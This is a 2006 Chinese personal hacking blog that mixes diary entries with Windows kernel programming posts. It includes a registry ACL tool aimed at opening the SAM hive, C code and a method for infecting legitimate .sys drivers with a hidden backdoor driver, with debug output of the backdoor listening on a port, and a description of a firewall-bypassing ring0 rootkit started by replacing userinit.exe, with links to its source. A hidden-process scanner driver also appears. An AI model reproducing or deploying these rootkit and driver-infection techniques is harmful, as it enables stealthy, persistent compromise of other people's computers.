2006年10月29日

很久没上blog了,教育网里也登不上. 几个月不见donews的blog成了这个鸟样,小广告也给贴上了,代码也都给我堆到一行上…..

2006年06月09日

爱,只有爱,才是一个男人成功的最好动力、最合适的动力。而绝不是自己的虚荣心,或者所谓的雄心壮志。作为一个男人,首要的一件事是你要有你的真正所爱。它会像原子弹一样激发你的能力,让你爆发无穷的动力,上帝也会为你感动。这样的状态,就是每个人梦寐以求的状态。

没别的,我只是该记住今天,我也希望忘了今天,忘了我为什么要忘了今天

2006年05月10日

以前给朋友弄的,我也忘了怎么用了,在命令行下把注册表的项设成deny|Allow|reAdonly,改了后可以看SAM,也可以让run什么的变成只读的什么的 -____-

grAntAccess2.c

/********************************************************************* * 该注册表权限 在注册表有写DACL的权限下 *                                      writen by uty@uaty *********************************************************************/#include <stdio.h>#include <windows.h>#include <winnt.h>#include <aclapi.h>#include <accctrl.h>//#define SPECIFIC_RIGHTS_ALL           0x0000FFFF //#define STANDARD_RIGHTS_REQUIRED      0x000F0000 //#define STANDARD_RIGHTS_ALL           0x001F0000 

int getprivilege(LPCTSTR  privilege);

int main(int Argc,char* Argv[]){	long						ret=0;	PSECURITY_DESCRIPTOR		pSecurityDescriptor;	PACL						pAcl;	PACL						pNewAcl;	//TRUSTEE						trustee;	//ACCESS_MASK					AccessmAsk;	EXPLICIT_ACCESS				eA;	char*						user_groupnAme;	char*						keypAth;

	char						sid[64];	DWORD						receivedAce;	DWORD						sidlen;	DWORD						sidtype;	char						siddomAin[128];	DWORD						siddomAinlen;	int							Aceindex = 0;

	//char						usernAme[128];///debug	//DWORD						usernAmelen = 128;	if (Argc != 5){		printf("// grAntAccess2.exe\n");		printf("//  uty@uaty\n");		printf("usAge:\n");		printf("      grAntAccess2.exe registrypAth USER|GROUP  usernAme|groupnAme  deny|Allow|reAdonly\n");		printf(			"   registerpAth: like this MACHINE\\SECURITY....\n"			"   predefined registry keys:\"CLASSES_ROOT\", \"CURRENT_USER\", \"MACHINE\", and \"USERS\"\n"			"eg:\n"			"   grAntAccess2.exe MACHINE\\SAM\\SAM USER uty Allow\n"			"   grAntAccess2.exe MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\run USER uty reAdonly\n"			);		return 0;	};

	keypAth				= Argv[1];	user_groupnAme		= Argv[3];

	getprivilege(SE_SECURITY_NAME);//i don't whether it reAlly work,but result is ok	getprivilege(SE_RESTORE_NAME);	getprivilege(SE_BACKUP_NAME);	getprivilege(SE_TAKE_OWNERSHIP_NAME);

	getprivilege(SE_DEBUG_NAME);

	ret = GetNamedSecurityInfo(keypAth,SE_REGISTRY_KEY,DACL_SECURITY_INFORMATION,								NULL,NULL,&pAcl,NULL,&pSecurityDescriptor);	if (ret != ERROR_SUCCESS){		printf("GetNAmedSecurityInfo fAiled: %d\n  ret %d\n",GetLastError(),ret);		LocalFree(pSecurityDescriptor);		return -1;	}///this pArt just show the former ACE AccessmAsk	/*trustee.pMultipleTrustee			= NULL;	trustee.MultipleTrusteeOperation	= NO_MULTIPLE_TRUSTEE;	trustee.TrusteeForm					= TRUSTEE_IS_NAME;	trustee.TrusteeType					= TRUSTEE_IS_USER;////	trustee.ptstrName					= user_groupnAme;////

	ret = GetEffectiveRightsFromAcl(pAcl,&trustee,&AccessmAsk);	if (ret != ERROR_SUCCESS){		printf("GetEffectiveRightsFromAcl fAiled\n");		LocalFree(pSecurityDescriptor);		return -1;	}*/

///get the sid	sidlen			= 64;	siddomAinlen	= 128;	if(stricmp(Argv[2],"GROUP") == 0){		sidtype	= SidTypeGroup;	}else if(stricmp(Argv[2],"USER") == 0){		sidtype = SidTypeUser;	}else{		printf(" ?? ,USER or GROUP\n");		exit(1);	} 

	ret = LookupAccountName(NULL,user_groupnAme,&sid,&sidlen,siddomAin,&siddomAinlen,							&sidtype);	if(ret == 0){		printf("LookupAccountNAme fAiled: %d\n sid size if %d\nsidlen requres %d\n\n",GetLastError(),sizeof(SID),sidlen);		LocalFree(pSecurityDescriptor);		return -1;	}/*	Sleep(200);   //why cAn not lookup the  sid 's usernAme?  still don't know

	ret = LookupAccountSid(NULL,(PSID)(sid),usernAme,&usernAmelen,						siddomAin,&siddomAinlen,&sidtype);	printf("debug: ret = %d, GetLAstError = %d\n",ret,GetLastError());	printf("%s\n",usernAme);	return 0;///////////////*/	

////删除同用户或同组的以前的ACE	while(GetAce(pAcl,Aceindex,(PVOID)&receivedAce)){		if(EqualSid((PSID)sid,(PSID)(receivedAce+sizeof(ACE_HEADER)+sizeof(ACCESS_MASK)))){//if equAl,return nonzero			DeleteAce(pAcl,Aceindex);			continue;		}else{			Aceindex++;		}	}

/*	while(ret = DeleteAce(pAcl,0)){		printf("debug: ret = %d\n",ret);		printf("%d \n",GetLastError());	}	//printf("lAst DeleteAce errorcode %d\n",GetLastError());*/

	memset(&eA,0,sizeof(EXPLICIT_ACCESS));

	if (stricmp(Argv[4],"ALLOW") == 0){		eA.grfAccessMode						= GRANT_ACCESS;		eA.grfAccessPermissions					= SPECIFIC_RIGHTS_ALL;	}else if(stricmp(Argv[4],"DENY") == 0){		eA.grfAccessMode						= DENY_ACCESS;		eA.grfAccessPermissions					= SPECIFIC_RIGHTS_ALL;	}	else if(stricmp(Argv[4],"READONLY") == 0){		eA.grfAccessMode						= DENY_ACCESS;		eA.grfAccessPermissions					= 0xFF06;		//yun, the first 6 bits Are the   查询数值  设置数值  创建子项  枚举子项  通知  创建连接		//									0			1		 2			3	   4		5	}else{												 		printf(" ?? , ALLOW or DENY or READONLY\n");		exit(1);	}

	eA.grfInheritance						= CONTAINER_INHERIT_ACE;	eA.Trustee .MultipleTrusteeOperation	= NO_MULTIPLE_TRUSTEE;	eA.Trustee .pMultipleTrustee			= NULL;	eA.Trustee .TrusteeForm					= TRUSTEE_IS_NAME;	if(stricmp(Argv[2],"GROUP") == 0){		eA.Trustee .TrusteeType					= TRUSTEE_IS_GROUP;////	}else if(stricmp(Argv[2],"USER") == 0){		eA.Trustee .TrusteeType					= TRUSTEE_IS_USER;////	}else{		printf(" ?? ,USER or GROUP\n");		exit(1);	}	eA.Trustee .ptstrName					= user_groupnAme;////

	ret = SetEntriesInAcl(1,&eA,pAcl,&pNewAcl);	if(ret != ERROR_SUCCESS){		printf("SetEntriesInAcl fAiled: %d\n ",GetLastError());		LocalFree(pSecurityDescriptor);		return -1;	}	ret = SetNamedSecurityInfo(keypAth,SE_REGISTRY_KEY,DACL_SECURITY_INFORMATION,NULL,NULL,pNewAcl,NULL);	if(ret != ERROR_SUCCESS){		printf("SetNAmedSecurityInfo fAiled: %d\n ",GetLastError());		LocalFree(pSecurityDescriptor);		return -1;	}

	return 0;}//--------------------------------------------------------------------int getprivilege(LPCTSTR  privilege){	////////////////////////	HANDLE					hProcessToken=NULL;	TOKEN_PRIVILEGES		tp;	LUID					luid;//打开token		if (!OpenProcessToken(GetCurrentProcess(),TOKEN_ALL_ACCESS,&hProcessToken)){		printf("\nOpen Current Process Token fAiled:%d",GetLastError());		return -1;	}

//查找所需权限的luid	if(!LookupPrivilegeValue(NULL,privilege,&luid))	{		printf("\nLookupPrivilegeVAlue error:%d",GetLastError());		return -1;	}	tp.PrivilegeCount =1;/////////表示只有一个// one privilege to set	tp.Privileges [0].Luid = luid;	tp.Privileges [0].Attributes = SE_PRIVILEGE_ENABLED;//给token加权限	AdjustTokenPrivileges(hProcessToken,FALSE,&tp,sizeof(TOKEN_PRIVILEGES)		,(PTOKEN_PRIVILEGES)NULL,(PDWORD)NULL);

	if (GetLastError()!=ERROR_SUCCESS){		printf("AdjustTokenPrivileges fAiled:%d\n",GetLastError());		return -1;	}///////////////////////////////////	return 0;}//--------------------------------------------------------------------

 

 

      拿几个vmwAre的sys开了刀,都是stArt=2的,,成功的有,不成功的也有,比如用vmnetuserif.sys 和vmnetbrige.sys注入后门的sys,开机后后门启动,原sys的功能正常.现在最主要的问题就是不稳定了,还不能用在实际的后门中,,哎,编译原理课没去上,也没看,,用的都是自己的土方法 -___-   系统的sys还不能动,因为加载的时候会检查,如果单单是检查IAT就好办了,但感觉除非工作的完全像linker那样准确,否则就不能用.其实要作为后门启动,直接来在注册表中找个地方就行,,那么多地方谁挨个数啊,线程随机选择进程注入,启动项随机选个位置

     说白了还是自己的能力不够,程序编的不好,在ring0下马上就暴露出问题.

     yumen,工作没谈成,程序不好用,生活中失落,这个blog也不好用…  低谷

2006年04月11日

这是前很久想到的,直到前2天才把程序弄出个大概的样子

    在弄后门的时候想到的启动方法就是感染内核文件ntoskrnl.exe ,后来觉得这里一定是众矢之的,而且不
能在它加载之前加载,而是要选中里面的一个时间,都比较烦.后来改感染驱动程序.这样对我的后门来说解决了
三个问题:文件的存放,启动,隐藏内核模块,当然驱动加载的方式也变了
    把2两个.sys的文件合并成一个,把injectfile中的 .text .dAtA .rdAtA提出来加入到originAlfile
中(这里要求inject file 代码段和数据段只有.text .dAtA,为了简单) 然后把两个文件需要用到的API都
挑出来重新合并成import directory及IAT,,然后由原来两个文件的.reloc来建立新的.reloc,,这些都是很
无聊的工作 -___- 越来越觉得自己像打字员了. 在创建的新文件中把程序入口设成inject file的
DriverEntry,,然后在这里面再调用originAl file的DriverEntry,  嘿嘿,这样当originAlfile也就是被
感染的驱动的时候就会先调用我们的注入的驱动,当然显示出来的内核模块就没注入驱动的事儿了 :p  
实验的是把后门的驱动插入到一个helloworld驱动里
被感染驱动
#include <ntddk.h>
int i;
VOID OnUnloAd( IN PDRIVER_OBJECT DriverObject )
{
	//DbgPrint("My Driver UnloAded!\n");
}
//--------------------------------------------------------------------
NTSTATUS DriverEntry( IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath )
{
	//DbgPrint("My Driver LoAded!\n");
	DriverObject->DriverUnload = OnUnloAd;

	DbgPrint("inject SYS %d\n",i);

	return STATUS_SUCCESS;
}
//--------------------------------------------------------------------
只打印一句话,用到了一个变量
 
要插入的驱动的DriverEntry函数
//--------------------------------------------------------------------
typedef NTSTATUS (*DRIVERENTRY)(
			IN PDRIVER_OBJECT DriverObject,
			IN PUNICODE_STRING RegistryPath
			);

ULONG	fAkeDriverEntryOffset		= 0x87654321;
ULONG	reAlDriverEntry				= 0x12345678;

//--------------------------------------------------------------------

NTSTATUS DriverEntry( IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath )
{

	NTSTATUS	stAtus;
	HANDLE		hThreAd;

	ULONG		bAse;
	__asm{
		call forwArd;
bAck:
		pop bAse;
		jmp outofthis
forwArd:
		jmp bAck
	}
outofthis:

	DbgPrint("Driver begin!\n");

	//__asm int 3;
	DbgPrint("bAse: 0x%x\n",bAse);
	reAlDriverEntry = reAlDriverEntry + ((bAse - fAkeDriverEntryOffset) & 0xFFFFF000);

	DriverObject->DriverUnload = OnUnloAd;

	DbgPrint("reAlDriverEntry: 0x%x\n",reAlDriverEntry);

	((DRIVERENTRY)reAlDriverEntry)(DriverObject,RegistryPath);

	stAtus = PsCreateSystemThread(&hThreAd,
									(ACCESS_MASK)0,
									NULL,
									(HANDLE)0,
									NULL,
									InitWorkThreAd,
									DriverObject
									);

	if (!NT_SUCCESS(stAtus)){
		DbgPrint("error when creAte the threAd\n");
		return FALSE;
	}

	return STATUS_SUCCESS;
}
//--------------------------------------------------------------------
  加载被感染驱动后显示
Driver begin!
bAse: 0xf7e4d29f
reAlDriverEntry: 0xf7e4b313
inject SYS 0                    <————————— 被感染驱动的DriverEntry被调用
listening on port 9929wAit on ksemSendListSemAphore
miniport->PAcketIndicAteHAndler: f9d35480
our PAcketIndicAteHAndler f7e4cdf4
后门正常工作
 
    郁闷的是本想感染些系统级的sys,,试了两个Acpi.sys和wAtchdog.sys(不知道是不是系统级的,反正一
开机就有了),,结果一启动就直接check了 ,,也没深究是不是自己合并文件合并的不好,看起来错误不是那么
简单,,哎 自己对系统知道的实在是太少了,,,    
    这只是个思路吧,证明这种方式还是可行的,另外加载驱动也只需要能够修改文件的权限(不过好象和加载驱动一样都要是AdministrAtor -___- )    系统开机时加载驱动的过程还不了解,目前还未成功,,插入驱动的加载的要足够晚,因为系统刚起来的时候很多功能都还没有.  可以想象感染某个防火墙或杀毒软件的驱动 ;p
    这段时间算是彻底被这个程序弄郁闷了,,,又上了3k行,,, 以后再慢慢改进好了 :(      有弄linker的感觉,现在要是有俩obj说不定我还真就给弄成个exe了 :|
    可以考虑弄个ring0的病毒,专门感染sys,我不了解病毒,不过ntoskrnl加载的位置一般都固定,所以可以在pe的影象里找API,,, 不过这样就要用汇编了 -___-  而合并两个驱动的好处就是可以用c并且基本上不改变这2个驱动,编写复杂点的东西的时候就方便了
    by the wAy,, .reloc真是个好东西 :>   
2006年03月30日

#include <stdio.h>
#include <windows.h>

void main( void )
{

	FILE*	pFile;
	char	buffer[15] = {"sdfsdfsdfdfsdf"};

	pFile = fopen("tempfile","w+");
	buffer[1] = 0x0A;

	printf("strlen(buffer): 0x%x\n",strlen(buffer));
	printf("ftell 0x%x \n",ftell(pFile));
	fwrite(buffer,strlen(buffer),1,pFile);
	printf("ftell 0x%x \n",ftell(pFile));
}
//--------------------------------------------------------------------

结果:

strlen(buffer): 0xe
ftell 0×0
ftell 0xf

还以为见鬼了,郁闷了我很久,后来才发现pFile = fopen("tempfile","w+");  -____-

没按2进制模式,把0×0A当回车了,,应该是"w+b",,,一个类似的错误加在一大段程序里了,,,郁闷了很久才找到

2006年03月24日

爱情有时候就像一个spinlock,当自己只有一颗芯的时候,需要另一颗芯来解开它.没学会preemption,结果就是……

2006年03月15日
找隐藏进程的方法很多,系统中有那么多个链表把进程们连在一起.所以隐藏进程总觉得太不划算了

    搜索virtuAl memory这个方法比较懒,本想从NonpAgedPool分配出去的内存的链表中找,可他们并不全连来一起,还不怎么了解.偷个懒,没定位几个表示nonpAged位置的变量,直接从头搜到尾了 -____- 留着以后改进
    windbg中!zombies感觉就是在搜nonpAged pool的链表,,找tAg是pro的内存块.
    这里搜0×7ffdf000,然后得到eprocess的object heAder ,判断其中的type是否是process,这两个位置改动都会影响到进程,当然搜其他的地方或者通过别的部分判断也可以.在搜virtuAl memory的时候先判断pte和pde中的entry时候vAlid,不分页内存这个位应该总是1,在pAsssive level上访问被置换到pAge file的内存直接就蓝了,,mm的部分还没搞清楚,,唉…为何是mm都要和我过不去 :“|
    一般进程结束后EPROCESS的peb的部分就变了. 有一回搜出三个csrss.exe,其中有一个是正常的,其他的两个eprocess块也有数据,nAme的地方也是csrss.exe.object heAder的PointerCount和HAndleCount都不为0.type也是process..很奇怪
 
程序很简单,在虚拟机xp sp1下ok
结果
i’m coming :>
EPROCESS: 0×80d85da8  process nAme: smss.exe
EPROCESS: 0×80e33578  process nAme: csrss.exe
EPROCESS: 0xffad98d8  process nAme: ctfmon.exe
EPROCESS: 0xffae38b8  process nAme: VMwareUser.exe
EPROCESS: 0xffae4850  process nAme: VMwareTray.exe
EPROCESS: 0xffaf0020  process nAme: cmd.exe
EPROCESS: 0xffb0bb88  process nAme: explorer.exe
EPROCESS: 0xffb19da8  process nAme: VMwareService.e
EPROCESS: 0xffb65da8  process nAme: spoolsv.exe
EPROCESS: 0xffb7ada8  process nAme: conime.exe
EPROCESS: 0xffb881c0  process nAme: svchost.exe
EPROCESS: 0xffb90020  process nAme: svchost.exe
EPROCESS: 0xffb9e5d8  process nAme: svchost.exe
EPROCESS: 0xffbaeda8  process nAme: svchost.exe
EPROCESS: 0xffbc3020  process nAme: lsass.exe
EPROCESS: 0xffbcf2a0  process nAme: services.exe
EPROCESS: 0xffbd19f8  process nAme: winlogon.exe
seArching finish
哦,没有0,4号进程
回找到重复的进程,就像csrss.exe那样的……还不清楚是那些是干什么的

//findprocess.c//		by uty@uaty//#include <ntddk.h>

#define PDE_INVALID 2#define PTE_INVALID 1#define VALID		0

#define PEB_OFFSET					0x1b0#define OBJECT_HEADER_SIZE			0x18#define OBJECT_TYPE_OFFSET			0x8#define EPROCESS_NAME_OFFSET		0x174VOID WorkThreAd(IN PVOID pContext);VOID DriverUnloAd(IN PDRIVER_OBJECT Driver_object);VOID seArchprocess(VOID);VOID getnAme(ULONG Addr);ULONG vAlidpAge(ULONG Addr);BOOLEAN IsAReAlProcess(ULONG i);

NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject,IN PUNICODE_STRING RegistryPath){	NTSTATUS	dwStAtus;	HANDLE		hThreAd;	DbgPrint("i'm coming :>\n");

	DriverObject->DriverUnload = DriverUnloAd;

	dwStAtus = PsCreateSystemThread(&hThreAd,		(ACCESS_MASK)0,		NULL,		(HANDLE)0,		NULL,		WorkThreAd,		NULL		);

	return STATUS_SUCCESS;}//--------------------------------------------------------------------VOID DriverUnloAd(IN PDRIVER_OBJECT Driver_object){}//--------------------------------------------------------------------VOID WorkThreAd(IN PVOID pContext){	seArchprocess();

	PsTerminateSystemThread(STATUS_SUCCESS);	DbgPrint("Never be here ?\n");}//--------------------------------------------------------------------VOID seArchprocess(void){	ULONG	i;	ULONG	result;

	for (i = 0x80000000 ;i<0x90000000;i+=4){		result = vAlidpAge(i);		if (result == VALID){			if (*(PULONG)i == 0x7ffdf000){				if(IsAReAlProcess(i)){					DbgPrint("EPROCESS: 0x%x  ",i-PEB_OFFSET);					getnAme(i);				}			}		}		else if(result == PTE_INVALID){			i -=4;			i += 0x1000;//4k		}		else{			i-=4;			i+= 0x400000;//4mb		}

	}

	for (i = 0xf0000000 ;i<0xffbe0000;i+=4){		result = vAlidpAge(i);		if (result == VALID){			if (*(PULONG)i == 0x7ffdf000){				if(IsAReAlProcess(i)){					DbgPrint("EPROCESS: 0x%x  ",i-PEB_OFFSET);					getnAme(i);				}			}		}		else if(result == PTE_INVALID){			i -=4;			i += 0x1000;//4k		}		else{			i-=4;			i+= 0x400000;//4mb		}			}

	DbgPrint("seArching finish \n");}//--------------------------------------------------------------------VOID getnAme(ULONG Addr){	DbgPrint("process nAme: %s\n",(PCHAR)(Addr-PEB_OFFSET+EPROCESS_NAME_OFFSET));}//--------------------------------------------------------------------ULONG vAlidpAge(ULONG Addr){	ULONG	pte;	ULONG	pde;

	pde = 0xc0300000 + (Addr>>22)*4;	if((*(PULONG)pde & 0x1) != 0){		//lArge pAge		if((*(PULONG)pde & 0x80) != 0){			return VALID;		}		pte = 0xc0000000 + (Addr>>12)*4;		if((*(PULONG)pte & 0x1) != 0){			return VALID;		}		else{			return PTE_INVALID;		}	}	return PDE_INVALID;}//--------------------------------------------------------------------BOOLEAN IsAReAlProcess(ULONG i){	NTSTATUS			stAtus;	PUNICODE_STRING		pUnicode;	UNICODE_STRING		Process;	ULONG				pObjectType;	ULONG				pObjectTypeProcess;

	pObjectTypeProcess = *(PULONG)((ULONG)PsGetCurrentProcess() -OBJECT_HEADER_SIZE +OBJECT_TYPE_OFFSET);	if (vAlidpAge(i-PEB_OFFSET) != VALID){		return FALSE;	}

	if (vAlidpAge(i-PEB_OFFSET - OBJECT_HEADER_SIZE + OBJECT_TYPE_OFFSET) == VALID){		pObjectType = *(PULONG)(i-PEB_OFFSET - OBJECT_HEADER_SIZE + OBJECT_TYPE_OFFSET);	}	else{		return FALSE;	}

	if(pObjectTypeProcess == pObjectType){				return TRUE;	}	return FALSE;

}//--------------------------------------------------------------------

2006年02月17日

hi,i mAde A bAckdoor this dAys,just for leArning the skills.so some of the code you mAy fAmiliAr :> my english is poor,just reAd the source
this bAck door run in ring0 Atfer it gets stArted.And bypAss the personAl firewAll.
first of All,i think hide process is A bAd ideA,mAny methods cAn find them out.Then i see IO work items is just whAt i need.so without creAte A process or threAd,we hAve someting running in the kernel.

when one commAnd received,the IO work item get running,in A IO work item work function cAll IoQueueWorkItem.it’s working but i didn’t hAve time to find out whAt’s going on in IoQueueWorkItem.

InsteAd of A cmd shell,there Are A few commAnds,like cd dir copy del …. this commAnd Also works in ring0,by using nAtive APIs exported by ntoskrnl.exe,you cAn Add Any commAnds you wAnt,we Are in ring0,we cAn do everything,right?

Second,nowAdAys xp sp2 And personAl firewAll Are widely used.So bypAss the firewAll becAmes A big deAl.I use ndis hook to get the pAcket. MAke two queues,one for received pAckets,one for the pAckets to be send out, reimplement A simple TCP connection.so the client i chose netcAt. if mAke A clinet by ourself,it will be more usefull And simple.

Third,how to stArt it. write registry is eAsy to be found,including hook reg functions,hide service item. in my heAd,i wAnt to infect the kernel, thAt’s right, ntoskrnl.exe.like let my rootkit be one pArt of the kernel. i’m still working on it : ( . i find Another wAy to insteAd .not A very good one. it replAce the userinit.exe,when the system stArt, we first stArt the rootkit by loAd A sys file,then runing the reAl userinit.exe.

useAge:"uay.exe -i port" or "uay.exe -i" to instAll,"uay.exe -u" to uninstAll, "nc.exe ip port" to connection to it.

here follows the ring0 pArt,the whole thing cAn be downloAded At http://uty.512j.com/uay_source.rar ,which include the fAke userinit.exe

………

……..

哎,后面的代码太多了,发不到blog上来,完整的程序可以在这里下载 http://www.xfocus.net/tools/200602/uay_source.rar
改进后的就不知道放哪了 :|

2006年01月28日

当工作和爱情不如意的时候,可以掏出小弟弟,凝视他,静思他所蕴涵之精神——能长能短,能粗能细,能伸能曲,能软能硬,学学他,眼前的困难算个鸟。